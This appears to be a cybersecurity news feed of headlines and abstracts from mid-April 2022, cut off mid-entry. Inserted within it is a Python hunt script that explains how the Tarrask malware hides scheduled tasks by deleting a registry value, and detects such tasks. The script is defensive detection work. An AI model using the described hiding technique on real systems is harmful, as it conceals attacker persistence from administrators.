Abstract A new information-stealing malware called ZingoStealer has been discovered with powerful data-stealing features and the ability to load additional payloads or mine Monero.

BleepingComputer

April 14, 2022 – Attack

Lazarus Targets Chemical Sector Full Text

Abstract The campaign appears to be a continuation of Lazarus activity dubbed Operation Dream Job, which was first observed in August 2020. In the past, it targeted the defense, government, and engineering sectors.

Symantec

April 14, 2022 – Government

FBI links largest crypto hack ever to North Korean hackers Full Text

Abstract The Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned the address that received the cryptocurrency stolen in the largest cryptocurrency hack ever, the hack of Axie Infinity's Ronin network bridge.

BleepingComputer

April 14, 2022 – Government

FBI Memphis Field Office Warns of Increase in Sextortion Schemes Targeting Teenage Boys Full Text

Abstract The FBI is receiving an increasing number of reports of adults posing as age-appropriate females coercing young boys through social media to produce sexual images and videos and then extorting money from them.

FBI

April 14, 2022 – Attack

Hackers target Ukrainian govt with IcedID malware, Zimbra exploits Full Text

Abstract Hackers are targeting Ukrainian government agencies with new attacks that use Zimbra exploits and phishing emails pushing the IcedID malware.

BleepingComputer

April 14, 2022 – Criminals

Haskers Gang Introduces New ZingoStealer Malware for Free to Target Gamers Full Text

Abstract This information stealer, first introduced to the wild in March 2022, is currently undergoing active development and multiple releases of new versions have been observed recently.

Cisco Talos

April 14, 2022 – Breach

Hetzner lost customer data and gave 20€ as compensation Full Text

Abstract Hetzner Online GmbH, a German cloud services provider, told some customers this week that their data had been irreversibly lost, and provided them with 20€ of compensation in online credit.

BleepingComputer

April 14, 2022 – Education

The top 10 password attacks and how to stop them Full Text

Abstract To better understand how to protect passwords in your environment from attacks, let's look at the top 10 password attacks and see what your organization can do to prevent them.

BleepingComputer

April 14, 2022 – General

Instagram beyond pics: Sexual harassers, crypto crooks, ID thieves Full Text

Abstract A platform for everyone to seamlessly share their best moments online, Instagram is slowly turning into a mecca for the undesirables—from sexual harassers to crypto "investors" helping you "get rich fast." How do you keep yourself safe against such profiles?

BleepingComputer

April 14, 2022 – Vulnerabilities

Flaw in Rarible NFT market allowed theft of crypto assets Full Text

Abstract A security flaw in the Rarible NFT (non-fungible token) marketplace allowed threat actors to use a relatively simple attack vector to steal digital assets from the target's accounts and transfer them directly to their wallets.

BleepingComputer

April 14, 2022 – Attack

OldGremlin ransomware gang targets Russia with new malware Full Text

Abstract OldGremlin, a little-known threat actor that uses its particularly advanced skills to run carefully prepared, sporadic campaigns, made a comeback last month after a gap of more than one year.

BleepingComputer

April 13, 2022 – APT

U.S. Warns of APT Hackers Targeting ICS/SCADA Systems with Specialized Malware Full Text

Abstract The U.S. government on Wednesday warned of nation-state actors deploying specialized malware to maintain access to industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices. "The APT actors have developed custom-made tools for targeting ICS/SCADA devices," multiple U.S. agencies said in an alert. "The tools enable them to scan for, compromise, and control affected devices once they have established initial access to the operational technology (OT) network." The joint federal advisory comes courtesy of the U.S. Department of Energy (DoE), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI). The custom-made tools are specifically designed to single out Schneider Electric programmable logic controllers (PLCs), OMRON Sysmac NEX PLCs, and Open Platform Communications Unified Architecture (OPC UA) servers. On top of that, the unnamed actors

The Hacker News

April 13, 2022 – Vulnerabilities

Critical VMware Workspace ONE Access Flaw Under Active Exploitation in the Wild Full Text

Abstract A week after VMware released patches to remediate eight security vulnerabilities in VMware Workspace ONE Access, threat actors have begun to actively exploit one of the critical flaws in the wild. Tracked as CVE-2022-22954, the critical issue relates to a remote code execution vulnerability that stems from server-side template injection in VMware Workspace ONE Access and Identity Manager. The bug is rated 9.8 in severity. "A malicious actor with network access can trigger a server-side template injection that may result in remote code execution," the company noted in its advisory. The virtualization services provider has since revised its bulletin to warn customers of confirmed exploitation of CVE-2022-22954 occurring in the wild. Cybersecurity firm Bad Packets also corroborated that it detected attempts to weaponize the vulnerability. It's worth noting that the patches shipped last week address seven more vulnerabilities in VMware Work

The Hacker News

April 13, 2022 – Government

CISA warns orgs to patch actively exploited Windows LPE bug Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has added ten new security bugs to its list of actively exploited vulnerabilities, including a high severity local privilege escalation bug in the Windows Common Log File System Driver.

BleepingComputer

April 13, 2022 – Attack

Industroyer2 Found Targeting Energy Sector in Ukraine Full Text

Abstract Sandworm APT has been associated with the new Industroyer2 malware, which was used to target electric power systems in Ukraine. The Sandworm group also uses other malware families such as CaddyWiper, AwfulShred, OrcShred, and SoloShred. Organizations are advised to follow the recommendation ...

Cyware Alerts - Hacker News

April 13, 2022 – Education

Webinar: How The Right XDR Can Be a Game-Changer for Lean Security Teams Full Text

Abstract Extended detection and response (XDR) is expected to be the future of cybersecurity, merging security technologies with the evolving approach to the way we do cybersecurity. And while many organizations are scrambling to integrate XDR into their cybersecurity strategies, even more are still trying to figure out what XDR really is and whether it's even the right solution for their organization. But there are some organizations that are getting lost in the debate and are wondering if there is a place for them in this new frontier of cybersecurity: organizations with lean security teams and limited resources. Fortunately, Cynet, a cybersecurity company, is hosting an upcoming webinar in partnership with Enterprise Strategy Group (ESG) that will explore how choosing the right XDR can be impactful for companies' lean security teams. During the webinar, Jon Oltsik, Senior Principal Analyst with ESG, and George Tubin, Director of Product Strategy at Cynet, will cover: Lea

The Hacker News

April 13, 2022 – Vulnerabilities

CVE-2021-31805 RCE bug in Apache Struts was finally patched Full Text

Abstract Apache addressed a critical RCE flaw in Apache Struts that was linked to a previous issue that had not been properly fixed. Apache Struts is an open-source web application framework for developing Java EE web applications. The Apache Software Foundation...

Security Affairs

April 13, 2022 – Attack

African banks heavily targeted in RemcosRAT malware campaigns Full Text

Abstract African banks are increasingly targeted by malware distribution campaigns that employ HTML smuggling tricks and typo-squatted domains to drop remote access trojans (RATs).

BleepingComputer

April 13, 2022 – Government

CISA Warns Against Russian Hackers Exploiting a Critical Bug Full Text

Abstract CISA issued an order urging federal civilian agencies and organizations to fix the actively exploited bug impacting WatchGuard Firebox and XTM appliances. Cyclops Blink, before being disrupted, targeted nearly one percent of WatchGuard Firebox firewall appliances using a CVE-2022-23176 exploit ...

Cyware Alerts - Hacker News

April 13, 2022 – Malware

Microsoft Exposes Evasive Chinese Tarrask Malware Attacking Windows Computers Full Text

Abstract The Chinese-backed Hafnium hacking group has been linked to a piece of new malware that's used to maintain persistence on compromised Windows environments. The threat actor is said to have targeted entities in the telecommunication, internet service provider and data services sectors from August 2021 to February 2022, expanding from the initial victimology patterns observed during its attacks exploiting the then zero-day flaws in Microsoft Exchange Servers in March 2021. Microsoft Threat Intelligence Center (MSTIC), which dubbed the defense evasion malware "Tarrask," characterized it as a tool that creates "hidden" scheduled tasks on the system. "Scheduled task abuse is a very common method of persistence and defense evasion — and an enticing one, at that," the researchers said. Hafnium, while most notable for Exchange Server attacks, has since leveraged unpatched zero-day vulnerabilities as initial vectors to drop web shells and other mal

The Hacker News

April 13, 2022 – APT

China-linked Hafnium APT leverages Tarrask malware to gain persistence Full Text

Abstract The China-linked Hafnium APT group has started using a new piece of malware to gain persistence on compromised Windows systems. The China-backed Hafnium cyberespionage group is likely behind a piece of new malware, dubbed Tarrask, that's used to maintain...

Security Affairs

April 13, 2022 – Botnet

New Fodcha DDoS botnet targets over 100 victims every day Full Text

Abstract A rapidly growing botnet is ensnaring routers, DVRs, and servers across the Internet to target more than 100 victims every day in distributed denial-of-service (DDoS) attacks.

BleepingComputer

April 13, 2022 – Malware

Fakecalls - An Unusual Twist to Banking Customer Support Frauds Full Text

Abstract A new banking trojan called Fakecalls hijacks phone conversations between a potential victim and their bank's customer support to steal files stored on devices. The trojan can play a pre-recorded message that mimics the ones often used by banks to greet customers seeking support. Experts suggest down ...

Cyware Alerts - Hacker News

April 13, 2022 – Attack

Russian Hackers Tried Attacking Ukraine’s Power Grid with Industroyer2 Malware Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday disclosed that it thwarted a cyberattack by Sandworm, a hacking group affiliated with Russia's military intelligence, to sabotage the operations of an unnamed energy provider in the country. "The attackers attempted to take down several infrastructure components of their target, namely: Electrical substations, Windows-operated computing systems, Linux-operated server equipment, [and] active network equipment," The State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said in a statement. Slovak cybersecurity firm ESET, which collaborated with CERT-UA to analyze the attack, said the attempted intrusion involved the use of ICS-capable malware and regular disk wipers, with the adversary unleashing an updated variant of the Industroyer malware, which was first deployed in a 2016 assault on Ukraine's power grid. "The Sandworm attackers made an attempt to d

The Hacker News

April 13, 2022 – Vulnerabilities

JekyllBot:5 flaws allow hacking TUG autonomous mobile robots in hospitals Full Text

Abstract Researchers discovered five vulnerabilities that can be exploited to remotely hack Aethon's TUG autonomous mobile robots used in hospitals. Researchers at healthcare IoT security firm Cynerio discovered a collection of five vulnerabilities impacting TUG autonomous...

Security Affairs

April 13, 2022 – Vulnerabilities

Hackers exploit critical VMware CVE-2022-22954 bug, patch now Full Text

Abstract Security researchers have published various proof-of-concept (PoC) scripts for exploiting CVE-2022-22954 on social media and other channels, essentially enabling malicious actors to attack unpatched systems.

BleepingComputer

April 13, 2022 – Breach

CitySprint Discloses Security Breach Impacting Personal Data of Delivery Drivers Full Text

Abstract An email was sent on April 7th to thousands of drivers confirming that a security breach had occurred. CitySprint, which was recently acquired by parcel delivery giant DPD Group, uses self-employed drivers to deliver packages across the UK.

Graham Cluley

April 13, 2022 – Criminals

FBI, Europol Seize RaidForums Hacker Forum and Arrest Admin Full Text

Abstract An international law enforcement operation raided and took down RaidForums, one of the world's largest hacking forums notorious for selling access to hacked personal information belonging to users. Dubbed Tourniquet, the seizure of the cybercrime website involved authorities from the U.S., U.K., Sweden, Portugal, and Romania, with the criminal investigation resulting in the arrest of the forum's administrator at his home last month in Croydon, England. The three confiscated domains associated with the illicit marketplace include "raidforums[.]com," "Rf[.]ws," and "Raid[.]lol." Diogo Santos Coelho (aka "Omnipotent"), the said founder and chief administrator, was apprehended in the U.K. on January 31 and is pending extradition to the U.S. Santos Coelho has been charged with conspiracy, access device fraud, and aggravated identity theft. In addition to detailing Santos Coelho's central role in designing and administering the soft

The Hacker News

April 13, 2022 – Privacy

EU officials were targeted with Israeli surveillance software Full Text

Abstract According to a report published by Reuters, Israeli surveillance software was used to spy on senior officials in the European Commission. One of the officials targeted with the infamous spyware is Didier Reynders, a senior Belgian statesman...

Security Affairs

April 13, 2022 – Government

US warns of govt hackers targeting industrial control systems Full Text

Abstract A joint cybersecurity advisory issued by CISA, NSA, FBI, and the Department of Energy (DOE) warns of government-backed hacking groups being able to hijack multiple industrial devices using a new ICS-focused malware toolkit.

BleepingComputer

April 13, 2022

Update: T-Mobile Secretly Bought Its Customer Data from Hackers to Stop Leak. It Failed. Full Text

Abstract According to court documents unsealed today and reviewed by Motherboard, a third-party hired by T-Mobile tried to pay the hackers for exclusive access to that data and limit it from leaking more widely.

Vice


April 13, 2022 – Malware

Microsoft disrupts Zloader malware in global operation Full Text

Abstract A months-long global operation led by Microsoft's Digital Crimes Unit (DCU) has taken down dozens of domains used as command-and-control (C2) servers by the notorious ZLoader botnet.

BleepingComputer

April 13, 2022 – Vulnerabilities

Flaws in ABB Network Interface Modules Expose Industrial Systems to DoS Attacks Full Text

Abstract The vulnerabilities affect Symphony Plus SPIET800 and PNI800, which are network interface modules that enable communications between a control network and a host computer running an engineering tool or a human-machine interface (HMI).

Security Week

April 13, 2022 – General

3 Reasons Connected Devices are More Vulnerable than Ever Full Text

Abstract We are surrounded by billions of connected devices that contribute round-the-clock to practically every aspect of our lives - from transportation, to entertainment, to health and well-being. Here are the top three reasons why connected-device cybersecurity is more fragile than ever.

BleepingComputer

April 13, 2022 – General

Hardware-assisted security will go big soon – study Full Text

Abstract Hardware-assisted security (HAS) uses hardware extensions and components to support the security of higher-level machine layers, from the BIOS up through desktop applications.

The Register

April 13, 2022 – Botnet

New EnemyBot DDoS botnet recruits routers and IoTs into its army Full Text

Abstract A new Mirai-based botnet malware named Enemybot has been observed growing its army of infected devices through vulnerabilities in modems, routers, and IoT devices, with the threat actor operating it known as Keksec.

BleepingComputer

April 13, 2022 – Hacker

Hackers Pretend to Poach, Recruit Rival Bank Staff in New Remcos RAT Campaign Full Text

Abstract In recent weeks, the threat actors have been spotted using recruitment emails and messages to entice individuals considering moving from their current employment to rival financial companies.

ZDNet

April 13, 2022 – Vulnerabilities

Critical flaw in Elementor WordPress plugin may affect 500k sites Full Text

Abstract The authors of the Elementor Website Builder plugin for WordPress have just released version 3.6.3 to address a critical remote code execution flaw that may impact as many as 500,000 websites.

BleepingComputer

April 13, 2022 – Vulnerabilities

Critical Apache Struts RCE vulnerability wasn’t fully fixed, patch now Full Text

Abstract Apache has fixed a critical vulnerability in its vastly popular Struts project that was previously believed to have been resolved but, as it turns out, wasn't fully remedied. As such, CISA is urging users and administrators to upgrade to the latest, patched Struts 2 versions.

BleepingComputer

April 12, 2022 – Vulnerabilities

Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities Full Text

Abstract Microsoft's Patch Tuesday updates for the month of April have addressed a total of 128 security vulnerabilities spanning across its software product portfolio, including Windows, Defender, Office, Exchange Server, Visual Studio, and Print Spooler, among others. 10 of the 128 bugs fixed are rated Critical, 115 are rated Important, and three are rated Moderate in severity, with one of the flaws listed as publicly known and another under active attack at the time of the release. The updates are in addition to 26 other flaws resolved by Microsoft in its Chromium-based Edge browser since the start of the month. The actively exploited flaw (CVE-2022-24521, CVSS score: 7.8) relates to an elevation of privilege vulnerability in the Windows Common Log File System (CLFS). Credited with reporting the flaw are the U.S. National Security Agency (NSA) and CrowdStrike researchers Adam Podlosky and Amir Bazine. The second publicly-known zero-day flaw (CVE-2022-26904, CVSS score: 7.0)

The Hacker News

April 12, 2022 – Solution

Cross-Regional Disaster Recovery with Elasticsearch Full Text

Abstract Unsurprisingly, here at Rewind, we've got a lot of data to protect (over 2 petabytes worth). One of the databases we use is called Elasticsearch (ES or Opensearch, as it is currently known in AWS). To put it simply, ES is a document database that facilitates lightning-fast search results. Speed is essential when customers are looking for a particular file or item that they need to restore using Rewind. Every second of downtime counts, so our search results need to be fast, accurate, and reliable. Another consideration was disaster recovery. As part of our System and Organization Controls Level 2 (SOC2) certification process, we needed to ensure we had a working disaster recovery plan to restore service in the unlikely event that the entire AWS region was down. "An entire AWS region?? That will never happen!" (Except for when it did.) Anything is possible, things go wrong, and in order to meet our SOC2 requirements we needed to have a working solution. Specif

The Hacker News

April 12, 2022 – Criminals

Ethereum dev imprisoned for helping North Korea evade sanctions Full Text

Abstract Virgil Griffith, a US cryptocurrency expert, was sentenced on Tuesday to 63 months in prison after pleading guilty to assisting the Democratic People's Republic of Korea (DPRK) with technical info on how to evade sanctions.

BleepingComputer

April 12, 2022 – Botnet

SharkBot Propagates via Fake Antivirus Apps on Google Play Full Text

Abstract Check Point researchers discovered seven malicious apps on the Google Play Store posing as antivirus solutions to drop the SharkBot banking trojan. These malicious apps were downloaded more than 15,000 times before Google removed them. Researchers advise downloading apps only from trusted/verified ...

Cyware Alerts - Hacker News

April 12, 2022 – Vulnerabilities

Critical LFI Vulnerability Reported in Hashnode Blogging Platform Full Text

Abstract Researchers have disclosed a previously undocumented local file inclusion (LFI) vulnerability in Hashnode, a developer-oriented blogging platform, that could be abused to access sensitive data such as SSH keys, the server's IP address, and other network information. "The LFI originates in a Bulk Markdown Import feature that can be manipulated to provide attackers with unimpeded ability to download local files from Hashnode's server," Akamai researchers said in a report shared with The Hacker News. Local file inclusion flaws occur when a web application is tricked into exposing or running unapproved files on a server, leading to directory traversal, information disclosure, remote code execution, and cross-site scripting (XSS) attacks. The flaw, caused by the web application failing to adequately sanitize the path to a file that's passed as input, could have serious repercussions in that an assailant could navigate to any path on the server and access s

The Hacker News

April 12, 2022 – General

Cybersecuring the Pipeline Full Text

Abstract The two TSA mandatory directives are a welcome step to ensure that pipeline owners and operators implement the basic safeguards required to repel cyberattacks. Yet certain weaknesses in the current approach need to be acknowledged.

Lawfare

April 12, 2022 – Vulnerabilities

Microsoft Patch Tuesday for April 2022 fixed 10 critical vulnerabilities Full Text

Abstract Microsoft Patch Tuesday security updates for April 2022 fixed 128 vulnerabilities, including an actively exploited zero-day reported by the NSA. Microsoft Patch Tuesday security updates for April 2022 fixed 128 vulnerabilities in multiple products,...

Security Affairs

April 12, 2022 – Denial Of Service

Ransom DDoS attacks have dropped to record lows this year Full Text

Abstract Extortion denial-of-service activity, the so-called RDDoS (ransom distributed denial-of-service) attacks, has taken a tumble in the first quarter of the year, according to recent statistics from Cloudflare.

BleepingComputer

April 12, 2022 – Malware

New Octo Banking Trojan Abuses Android Accessibility Features Full Text

Abstract ThreatFabric stumbled across Octo, a rental banking trojan capable of gaining remote access to compromised devices. It is said to be a rebrand of a similar Android threat called ExobotCompact. The malicious apps acting as droppers are identified as Pocket Screencaster, Fast Cleaner 2021, Play Store ...

Cyware Alerts - Hacker News

April 12, 2022 – Privacy

E.U. Officials Reportedly Targeted with Israeli Pegasus Spyware Full Text

Abstract Senior officials in the European Union were allegedly targeted with NSO Group's infamous Pegasus surveillance tool, according to a new report from Reuters. At least five individuals, including European Justice Commissioner Didier Reynders, are said to have been singled out in total, the news agency said, citing documents and two unnamed E.U. officials. However, it's not clear who used the commercial spyware against them or what information was obtained following the attacks. NSO Group said in a statement shared with Reuters that it was not responsible for the hacking attempts, adding that the targeting "could not have happened with NSO's tools." The targeting is said to have come to light after Apple notified the victims of state-sponsored attacks last November as part of its efforts to stop the Israeli surveillance firm from targeting its customers. That same month, the iPhone maker filed a lawsuit against NSO Group, seeking a court-issued injunction ai

The Hacker News

April 12, 2022 – Criminals

Operation TOURNIQUET: Authorities shut down dark web marketplace RaidForums Full Text

Abstract The dark web marketplace RaidForums has been shut down and its infrastructure seized as a result of Operation TOURNIQUET. The illegal dark web marketplace RaidForums has been shut down and its infrastructure seized as a result of the international...

Security Affairs

April 12, 2022 – Vulnerabilities

Microsoft April 2022 Patch Tuesday fixes 119 flaws, 2 zero-days Full Text

Abstract Today is Microsoft's April 2022 Patch Tuesday, and with it comes fixes for two zero-day vulnerabilities and a total of 119 flaws.

BleepingComputer

April 12, 2022 – Malware

New META Stealer is Popular in the Underground Marketplaces Full Text

Abstract A researcher unearthed a malspam campaign distributing the new META infostealer to steal passwords stored in browsers, including Google Chrome, Edge, and Firefox, as well as cryptocurrency wallets. META tampers with Windows Defender using PowerShell to exclude .exe files from scanning to avoid ...

Cyware Alerts - Hacker News

April 12, 2022 – Vulnerabilities

NGINX Shares Mitigations for Zero-Day Bug Affecting LDAP Implementation Full Text

Abstract The maintainers of the NGINX web server project have issued mitigations to address security weaknesses in its Lightweight Directory Access Protocol (LDAP) Reference Implementation. "NGINX Open Source and NGINX Plus are not themselves affected, and no corrective action is necessary if you do not use the reference implementation," Liam Crilly and Timo Stark of F5 Networks said in an advisory published Monday. NGINX said that the reference implementation, which uses LDAP to authenticate users, is impacted only under three conditions: if the deployment uses command-line parameters to configure the Python-based reference implementation daemon, if it relies on unused, optional configuration parameters, or if it requires specific group membership to carry out LDAP authentication. Should any of the aforementioned conditions be met, an attacker could potentially override the configuration parameters by sending specially crafted HTTP request headers and even bypass group membership requirement

The Hacker News

April 12, 2022 – APT

Russia-linked Sandworm APT targets energy facilities in Ukraine with wipers Full Text

Abstract Russia-linked Sandworm APT group targeted energy facilities in Ukraine with INDUSTROYER2 and CADDYWIPER wipers. Russia-linked Sandworm threat actors targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2)...

Security Affairs

April 12, 2022 – Malware

Microsoft: New malware uses Windows bug to hide scheduled tasks Full Text

Abstract Microsoft has discovered a new malware used by the Chinese-backed Hafnium hacking group to maintain persistence on compromised Windows systems by creating and hiding scheduled tasks.

BleepingComputer
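The hiding trick in the Hafnium entry above is, per Microsoft's published analysis of this malware (which it calls Tarrask), the deletion of a single registry value: every scheduled task has a node under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<task path> carrying Id, Index and SD (the task's security descriptor), plus a node under TaskCache\Tasks\{Id} carrying the task body; remove SD and the task no longer appears in schtasks /query or the Task Scheduler UI, yet it keeps running. The hunt below is an added example, not Microsoft's or BleepingComputer's code. It parses the text output of `reg query <key> /s`, so it runs offline on an export collected during triage; the export embedded here is constructed, with made-up GUIDs and task names.

```python
r"""Find scheduled tasks whose Tree node lost its SD value (the Tarrask hiding technique).

Added example, not Microsoft's or BleepingComputer's code. SAMPLE_EXPORT is a
constructed `reg query ... /s` export; GUIDs and task names are invented.
On a live host, feed parse_reg_query() the output of:
  reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache" /s
"""
import re

TASKCACHE = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache"
TREE_PREFIX = TASKCACHE + "\\Tree\\"
TASKS_PREFIX = TASKCACHE + "\\Tasks\\"
# A value line from reg query: indented name, REG_* type, then the data.
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s*(?P<data>.*)$")

SAMPLE_EXPORT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Defrag\ScheduledDefrag
    Id    REG_SZ    {11111111-2222-4333-8444-555555555501}
    Index    REG_DWORD    0x3
    SD    REG_BINARY    010004809C000000A8000000000000001400000002

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemUpdater
    Id    REG_SZ    {11111111-2222-4333-8444-555555555502}
    Index    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11111111-2222-4333-8444-555555555501}
    Path    REG_SZ    \Microsoft\Windows\Defrag\ScheduledDefrag
    Author    REG_SZ    Microsoft Corporation

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11111111-2222-4333-8444-555555555502}
    Path    REG_SZ    \SystemUpdater
    Author    REG_SZ    WORKSTATION\Administrator
    Actions    REG_BINARY    0300000066660000000000000000000000
"""


def parse_reg_query(text):
    """Return {key_path: {value_name: data}} from `reg query /s` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):
            current = line.rstrip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = m.group("data").strip()
    return keys


def hidden_tasks(keys):
    """Tree nodes whose Id resolves to a task body under Tasks\ but which carry no SD value."""
    bodies = {k[len(TASKS_PREFIX):].upper(): v for k, v in keys.items() if k.startswith(TASKS_PREFIX)}
    hits = []
    for path, values in keys.items():
        if not path.startswith(TREE_PREFIX):
            continue
        task_id = values.get("Id", "").upper()
        if task_id not in bodies:
            continue  # folder node (no Id) or dangling reference, not a schedulable task
        if "SD" not in values:
            body = bodies[task_id]
            hits.append({
                "task": path[len(TREE_PREFIX):],
                "id": task_id,
                "path": body.get("Path", ""),
                "author": body.get("Author", ""),
            })
    return hits


if __name__ == "__main__":
    for hit in hidden_tasks(parse_reg_query(SAMPLE_EXPORT)):
        print(f"hidden task {hit['task']!r} (Id {hit['id']}) author={hit['author']!r}")
```

Requiring a matching Tasks\{Id} body keeps folder nodes and stale references out of the results. Once a hit is confirmed, the task body's Actions value tells you what runs, and the Microsoft-Windows-TaskScheduler/Operational log still records its executions even though the task is invisible to schtasks.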

April 12, 2022 – Attack

Attackers Abuse AWS Lambda to Mine Monero Full Text

Abstract Researchers stumbled across a new malware variant, dubbed Denonia, that targets AWS Lambda, a scalable cloud computing service used by SMBs and enterprise players worldwide. It is a Go-based wrapper designed to deploy a custom XMRig crypto miner for Monero mining. Experts suggest always using ... Read More

Cyware Alerts - Hacker News

April 12, 2022 – General

Finding Attack Paths in Cloud Environments Full Text

Abstract The mass adoption of cloud infrastructure is fully justified by innumerable advantages. As a result, today, organizations' most sensitive business applications, workloads, and data are in the cloud. Hackers, good and bad, have noticed that trend and effectively evolved their attack techniques to match this new tantalizing target landscape. With threat actors' high reactivity and adaptability, it is recommended to assume that organizations are under attack and that some user accounts or applications might already have been compromised. Finding out exactly which assets are put at risk through compromised accounts or breached assets requires mapping potential attack paths across a comprehensive map of all the relationships between assets.  Today, mapping potential attack paths is performed with scanning tools such as AzureHound or AWSPX. Those are graph-based tools enabling the visualization of assets and resources relationships within the related cloud service provider. By r

The Hacker News

April 12, 2022 – Vulnerabilities

NGINX project maintainers fix flaws in LDAP Reference Implementation Full Text

Abstract The maintainers of the NGINX web server project addressed a zero-day vulnerability in the Lightweight Directory Access Protocol (LDAP) Reference Implementation. The maintainers of the NGINX web server project have released security updates to address...

Security Affairs

April 12, 2022 – Vulnerabilities

Critical HP Teradici PCoIP flaws impact 15 million endpoints Full Text

Abstract HP is warning of new critical security vulnerabilities in the Teradici PCoIP client and agent for Windows, Linux, and macOS that impact 15 million endpoints.

BleepingComputer

April 12, 2022 – Phishing

DPRK-Nexus Adversary Targets South Korean Individuals in a New Chapter of Kitty Phishing Operation Full Text

Abstract Cluster25 traced a recent activity that started in the first days of April 2022 from a DPRK-nexus threat actor using spear-phishing emails containing Korean-based malicious documents with different lures to compromise its victims.

Cluster25

April 12, 2022 – Policy and Law

Google Sues Scammer for Running ‘Puppy Fraud Scheme’ Website Full Text

Abstract Google on Monday disclosed that it's taking legal action against a nefarious actor who has been spotted operating fraudulent websites to defraud unsuspecting people into buying non-existent puppies. "The actor used a network of fraudulent websites that claimed to sell basset hound puppies — with alluring photos and fake customer testimonials — in order to take advantage of people during the pandemic," Google's CyberCrime Investigation Group manager Albert Shin and senior counsel Mike Trinh said. The fraudulent scheme involved Nche Noel Ntse of Cameroon using a network of rogue websites, Google Voice phone numbers, and Gmail accounts to trick people into paying thousands of dollars online for "adorable puppies" that never arrived. The purported culprit is also alleged to have run a Google Ads campaign to push the fraudulent websites on top of search results pages as part of what Google characterized as "multiple international non-delivery scams."

The Hacker News

April 12, 2022 – Government

CISA adds WatchGuard flaw to its Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. CISA added the CVE-2022-23176 flaw in WatchGuard Firebox and XTM appliances to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2022-23176 flaw in WatchGuard Firebox...

Security Affairs

April 12, 2022 – Criminals

RaidForums hacking forum seized by police, owner arrested Full Text

Abstract The RaidForums hacker forum, used mainly for trading and selling stolen databases, has been shut down and its domain seized by U.S. law enforcement during Operation TOURNIQUET, an action coordinated by Europol that involved law enforcement agencies in several countries.

BleepingComputer

April 12, 2022 – Phishing

Double-Your-Crypto Scams Share Crypto Scam Host – Krebs on Security Full Text

Abstract The ark-x2[.]org site pretended to be a crypto giveaway website run by Cathie Wood, the founder and CEO of ARKinvest, an established Florida company that manages several exchange-traded investment funds.

Krebs on Security

April 12, 2022 – Criminals

LockBit ransomware gang lurked in a U.S. gov network for months Full Text

Abstract Threat analysts have found evidence of malicious actors using the LockBit ransomware strain lingering in the network of a regional U.S. government agency for at least five months.

BleepingComputer

April 12, 2022 – Attack

Panasonic’s Canadian Operations Suffered Ransomware Attack Full Text

Abstract In a statement provided to TechCrunch, Panasonic said that it was a victim of a “targeted cybersecurity attack” in February that affected some of its systems, processes, and networks.

Tech Crunch

April 12, 2022 – Attack

Sandworm hackers fail to take down Ukrainian energy provider Full Text

Abstract The Russian state-sponsored hacking group known as Sandworm tried on Friday to take down a large Ukrainian energy provider by disconnecting its electrical substations with a new variant of the Industroyer malware for industrial control systems (ICS) and a new version of the CaddyWiper data destruction malware.

BleepingComputer

April 12, 2022 – Business

Kaseya to acquire Datto for $6.2 billion Full Text

Abstract The all-cash transaction will be funded by an equity consortium led by Insight Partners, with significant investment from TPG Capital and Temasek, and participation from notable investors including Sixth Street.

Help Net Security

April 12, 2022 – Attack

BlackCat Ransomware Group Claims Attack on Florida International University Full Text

Abstract The ransomware group, which most recently attacked North Carolina A&T University, claimed it has stolen a range of personal information from students, teachers, and staff.

The Record

April 12, 2022 – Malware

Industroyer2: Industroyer reloaded Full Text

Abstract ESET researchers responded to a cyber-incident affecting an energy provider in Ukraine. The collaboration resulted in the discovery of a new variant of Industroyer malware named Industroyer2.

ESET Security

April 12, 2022 – Vulnerabilities

AWS RDS Vulnerability Leads to AWS Internal Service Credentials Full Text

Abstract Lightspin's Research Team obtained credentials to an internal AWS service by exploiting a local file read vulnerability on the RDS EC2 instance using the log_fdw extension.

Security Boulevard

April 11, 2022 – Malware

Third npm protestware: ‘event-source-polyfill’ calls Russia out Full Text

Abstract Developers are increasingly voicing their opinions through their open source projects in active use by thousands of software applications and organizations. Most recently, the developer of the 'event-source-polyfill' npm package peacefully protested Russia's "unreasonable invasion" of Ukraine, to Russian consumers.

BleepingComputer

April 11, 2022 – Breach

Over 16,500 Sites Hacked to Distribute Malware via Web Redirect Service Full Text

